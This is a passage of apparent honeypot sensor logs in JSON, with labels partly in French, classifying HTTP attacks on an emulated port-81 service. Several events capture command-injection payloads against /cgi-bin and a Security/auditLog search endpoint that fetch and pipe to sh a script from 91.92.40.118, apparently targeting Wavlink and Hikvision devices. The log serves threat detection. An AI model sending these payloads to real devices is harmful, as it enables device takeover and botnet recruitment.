\u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:81","http_user_agent":null,"http_referer":null,"tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_sensitive_path\u0022, \u0022http_suspicious_params\u0022, \u0022iot_http_endpoint\u0022, \u0022net_web_probe\u0022]","anomalies":"[\u0022high-entropy-query\u0022]","severity":10,"bytes_in":296},{"id":11860764,"ip":"45.156.87.213","ts":"2026-07-14 08:22:33.000000","proto":"tcp","src_port":59870,"dst_port":81,"service":"http","classification":"cmd_injection","waf_score":13,"waf_tags":"[\u0022950324:rce-0\u0022, \u0022950468:nosqli-3\u0022]","http_method":"GET","http_target":"\/cgi-bin\/;cd","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 2, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 2, \u0022http_path_ext\u0022: null, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022f257870e26046e30cbd03e9d5726ca53aa58b86f\u0022, \u0022http_target_hash\u0022: \u0022d405befa78aaecee1efcf37cb58895c28b2ff19c\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022GET\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 231, \u0022payload_entropy\u0022: 5.108571253784377, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 81, \u0022risk_waf\u0022: 60.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 5.5, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 60.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 54, \u0022tag_count\u0022: 7, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u002271641a5f08e03b30f6f95881961bbde73c9159b1\u0022, \u0022event_fingerprint\u0022: \u0022d7f0a472d4fe9fff7b67da8d9f595978ae350091\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag rce-0) \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 304, \u0022precision_signals\u0022: [\u0022MITRE-T1059\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022MITRE-T1059\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 932100 cmd exec\u0022, \u0022CRS 932120 pipe chain\u0022, \u0022CRS 932205\u0022, \u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 60.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 54}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u00229d6817a660dae6de1d986b8af8e23980\u0022, \u0022path_pattern_hash\u0022: \u002260d5de007ff2546f34f0bc3749dc5e1b\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 54}, \u0022payload_preview\u0022: \u0022GET \/cgi-bin\/;cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s wavlink;busybox wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s wavl\u0022, \u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/cgi-bin\/;cd\u0022, \u0022waf_tags\u0022: [\u0022950324:rce-0\u0022, \u0022950468:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022rce-0\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022GET \/cgi-bin\/;cd HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/cgi-bin\/;cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s wavlink;busybox wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s wavlink;curl http:\/\/91.92.40.118\/wget.sh|sh -s wavlink HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nConnection: close\\r\\n\\r\\n\u0022, \u0022payload_snippet\u0022: \u0022GET \/cgi-bin\/;cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s wavlink;busybox wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s wavl\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/cgi-bin\/;cd\u0022, \u0022waf_tags\u0022: [\u0022950324:rce-0\u0022, \u0022950468:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022rce-0\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022GET \/cgi-bin\/;cd HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/cgi-bin\/;cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s wavlink;busybox wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s wavlink;curl http:\/\/91.92.40.118\/wget.sh|sh -s wavlink HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nConnection: close\\r\\n\\r\\n\u0022, \u0022payload_snippet\u0022: \u0022GET \/cgi-bin\/;cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s wavlink;busybox wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s wavl\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag rce-0) \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u002267fc2a84ae392d91964fd9c8d9b9f0114188399c\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/cgi-bin\/;cd\u0022, \u0022request_line\u0022: \u0022GET \/cgi-bin\/;cd HTTP\/1.1\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022GET \/cgi-bin\/;cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s wavlink;busybox wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s wavl\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/cgi-bin\/;cd\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag rce-0) \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag rce-0) \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 54\/100 (Moyen) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 60.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 54}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 54, \u0022risk_label\u0022: \u0022Moyen\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 81, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022MITRE-T1059\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0146\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022MITRE-T1059\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0146\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/cgi-bin\/;cd\u0022, \u0022request_line\u0022: \u0022GET \/cgi-bin\/;cd HTTP\/1.1\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/cgi-bin\/;cd\u0022, \u0022evidence_snippet\u0022: \u0022GET \/cgi-bin\/;cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s wavlink;busybox wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s wavl\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 60 \u00b7 2 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002281\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950324:rce-0\u0022, \u0022950468:nosqli-3\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_sensitive_path\u0022, \u0022iot_http_endpoint\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"\/tmp;wget","http_host":"62.3.50.33:81","http_user_agent":null,"http_referer":null,"tags":"[\u0022950324:rce-0\u0022, \u0022950468:nosqli-3\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_sensitive_path\u0022, \u0022iot_http_endpoint\u0022, \u0022net_web_probe\u0022]","anomalies":"[]","severity":7,"bytes_in":231},{"id":11860765,"ip":"45.156.87.213","ts":"2026-07-14 08:22:33.000000","proto":"tcp","src_port":59880,"dst_port":81,"service":"http","classification":"lfi_path_traversal","waf_score":54,"waf_tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022]","http_method":"GET","http_target":"\/Security\/auditLog\/search?logTime=0;%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20hik3%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20hik3%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20hik3%60","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 2, \u0022http_query_params\u0022: 1, \u0022http_path_depth\u0022: 3, \u0022http_path_ext\u0022: null, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022f257870e26046e30cbd03e9d5726ca53aa58b86f\u0022, \u0022http_target_hash\u0022: \u00227069cd407ab69cbe41d2f22706d4ca61213e53cb\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022GET\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 292, \u0022payload_entropy\u0022: 5.165062035076323, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 81, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 78.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 30.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 6.0, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0}, \u0022risk_score\u0022: 60, \u0022tag_count\u0022: 11, \u0022anomaly_count\u0022: 1, \u0022campaign_key\u0022: \u002260de6e38eefb4e2dfd26904a9d97c1b473cb8a78\u0022, \u0022event_fingerprint\u0022: \u00222a60df4ba404d64c815dc4830295778ab5b3834c\u0022, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022, \u0022confidence\u0022: 0.59, \u0022classification_confidence\u0022: 0.59, \u0022precision_score\u0022: 70, \u0022precision_signals\u0022: [\u0022CRS-930100-sub\u0022], \u0022kb_rule_ids\u0022: [\u0022CRS-930100-sub\u0022], \u0022matched_patterns\u0022: [\u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 60}, \u0022named_classification_skipped\u0022: false, \u0022classification_parent\u0022: \u0022path_traversal\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 59.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022dded28d5fb031a68b702ea014e53e4d6\u0022, \u0022path_pattern_hash\u0022: \u0022b30061e72d047d96ba099ac8376cce65\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 60}, \u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20hik3%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20hik3%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20hik3%60\u0022, \u0022query_string\u0022: \u0022logTime=0;%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20hik3%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20hik3%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20hik3%60\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/Security\/auditLog\/search?logTime=0;%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20hik3%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20hik3%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20hik3%60 HTTP\/1.1\u0022, \u0022payload_snippet\u0022: \u0022GET \/Security\/auditLog\/search?logTime=0;%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20hik3%3Bbusybox%20wge\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20hik3%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20hik3%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20hik3%60\u0022, \u0022query_string\u0022: \u0022logTime=0;%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20hik3%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20hik3%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20hik3%60\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/Security\/auditLog\/search?logTime=0;%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20hik3%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20hik3%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20hik3%60 HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/Security\/auditLog\/search?logTime=0;%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20hik3%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20hik3%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20hik3%60 HTTP\/1.1\\r\\nHost: \u0022, \u0022payload_snippet\u0022: \u0022GET \/Security\/auditLog\/search?logTime=0;%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20hik3%3Bbusybox%20wge\u0022, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre\u0022: \u0022TA0001\u0022, \u0022threat_family\u0022: [\u0022path_traversal\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u00226b7127cd141c383f0d100eb0df9753e610e5d810\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20hik3%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20hik3%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20hik3%60\u0022, \u0022request_line\u0022: \u0022GET \/Security\/auditLog\/search?logTime=0;%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20hik3%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20hik3%3Bcurl%20http:\/\/\u2026\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022GET \/Security\/auditLog\/search?logTime=0;%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20hik3%3Bbusybox%20wge\u0022, \u0022attack_vector\u0022: \u0022lfi path traversal \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20hik3%3Bbusybox%20wge\u2026\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 59 % \u2014 8 tag(s) WAF\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 60\/100 (Moyen) \u2014 MITRE TA0001 \u2014 confiance 59 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 59, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 60}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 60, \u0022risk_label\u0022: \u0022Moyen\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 81, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022CRS-930100-sub\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022CRS-930100-sub\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022TA0001\u0022, \u0022mitre_technique\u0022: \u0022TA0001\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20hik3%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20hik3%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20hik3%60\u0022, \u0022request_line\u0022: \u0022GET \/Security\/auditLog\/search?logTime=0;%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20hik3%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20hik3%3Bcurl%20http:\/\/\u2026\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022lfi path traversal \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20hik3%3Bbusybox%20wge\u2026\u0022, \u0022evidence_snippet\u0022: \u0022GET \/Security\/auditLog\/search?logTime=0;%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20hik3%3Bbusybox%20wge\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, 